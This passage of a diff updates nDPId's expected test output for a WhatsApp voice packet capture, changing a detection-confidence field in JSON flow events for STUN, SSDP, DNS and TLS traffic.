00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1561455706912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706912,"pkt":"xiwDYGpkkLkxKPrKCABFAACa\/egAAEARKEbAqAIMuTzYM9wIDZYAhvTwAAMAaiESpEKmZ0918K0sABMVszhAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1561455706912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706912,"pkt":"xiwDYGpkkLkxKPrKCABFAACaQnoAAEAR47TAqAIMuTzYM9wIDZYAhvTvAAMAaiESpEKmZ0918K0sABMVszlAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1561455706913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706913,"pkt":"xiwDYGpkkLkxKPrKCABFAACaTo8AAEARCe\/AqAIMnfDBMNwIDZYAhic+AAMAaiESpEKmZ0918K0sABMVszpAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1561455706913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706913,"pkt":"xiwDYGpkkLkxKPrKCABFAACapTEAAEARs0zAqAIMnfDBMNwIDZYAhic9AAMAaiESpEKmZ0918K0sABMVsztAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1561455706913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706913,"pkt":"xiwDYGpkkLkxKPrKCABFAACa5uYAAEARXUvAqAIMszzAMNwIDZYAhhLwAAMAaiESpEKmZ0918K0sABMVszxAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1561455706913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706913,"pkt":"xiwDYGpkkLkxKPrKCABFAACaa6sAAEAR2IbAqAIMszzAMNwIDZYAhhLvAAMAaiESpEKmZ0918K0sABMVsz1AAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706914,"flow_last_seen":1561455706914,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706914,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1561455706914,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706914,"pkt":"xiwDYGpkkLkxKPrKCABFAACa6jAAAEARaz\/AqAIMnfDEPtwIDZYAhiQsAAMAaiESpEKmZ0918K0sABMVsz5AAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706914,"flow_last_seen":1561455706914,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706914,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706914,"flow_last_seen":1561455706914,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706914,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1561455706914,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706914,"pkt":"xiwDYGpkkLkxKPrKCABFAACa\/isAAEARV0TAqAIMnfDEPtwIDZYAhiQrAAMAaiESpEKmZ0918K0sABMVsz9AAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1561455706925,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455706925,"pkt":"kLkxKPrKxiwDYGpkCABFAABIJPUAAFQRCb8fDVYwwKgCDA2W3AgANMY6AQMAGCESpEKmZ0918K0sABMVszYAIAAIAAHthnGmBnJAAgAIAAABa44DQzM="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1561455706935,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455706935,"pkt":"kLkxKPrKxiwDYGpkCABFAABIB5sAAFMROyed8MQ+wKgCDA2W3AgANNk5AQMAGCESpEKmZ0918K0sABMVsz4AIAAIAAHthnGmBnJAAgAIAAABa44DQzo="} @@ -84,84 +84,84 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1561455706945,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455706945,"pkt":"kLkxKPrKxiwDYGpkCABFAABIKZAAAFMR6fC5PNgzwKgCDA2W3AgANKn2AQMAGCESpEKmZ0918K0sABMVszgAIAAIAAHthnGmBnJAAgAIAAABa44DQ0I="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706979,"flow_last_seen":1561455706979,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455706979,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1561455706979,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1561455706979,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClm6MAAAIRafbAqAIM7\/\/\/+vzMB2wAkbYGTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706979,"flow_last_seen":1561455706979,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455706979,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706979,"flow_last_seen":1561455706979,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455706979,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707435,"flow_last_seen":1561455707435,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1561455707435,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1561455707435,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1561455707435,"pkt":"xiwDYGpkkLkxKPrKCABFAAA+06QAAP8RYqzAqAIMwKgCAeyFADUAKgBWfx8BAAABAAAAAAAAA3Bwcwh3aGF0c2FwcANuZXQAAAEAAQ=="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707435,"flow_last_seen":1561455707435,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1561455707435,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"pps.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707435,"flow_last_seen":1561455707435,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1561455707435,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"pps.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1561455707470,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1561455707470,"pkt":"kLkxKPrKxiwDYGpkCABFAABnIjoAAEAR0u7AqAIBwKgCDAA17IUAUyY\/fx+BgAABAAIAAAAAA3Bwcwh3aGF0c2FwcANuZXQAAAEAAcAMAAUAAQAACz4ADQZtbXgtZHMDY2RuwBDALgABAAEAAAA+AASd8BQ0"} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455707435,"flow_last_seen":1561455707470,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1561455707470,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"pps.whatsapp.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"157.240.20.52"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455707435,"flow_last_seen":1561455707470,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1561455707470,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"pps.whatsapp.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"157.240.20.52"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707474,"flow_last_seen":1561455707474,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455707474,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1561455707474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455707474,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGxd\/AqAIMnfAUNMVIAbt68MpNAAAAALDC\/\/823wAAAgQFtAEDAwcBAQgKNM5JcwAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1561455707511,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455707511,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFMG8uOd8BQ0wKgCDAG7xUi7sKeEevDKTqASbHBlBQAAAgQFeAQCCAq1oF6CNM5JcwEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1561455707513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455707513,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGxevAqAIMnfAUNMVIAbt68MpOu7CnhYAQBAb72QAAAQEICjTOSZq1oF6C"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455707474,"flow_last_seen":1561455707524,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1561455707524,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455707474,"flow_last_seen":1561455707564,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1561455707564,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455707474,"flow_last_seen":1561455707524,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1561455707524,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": 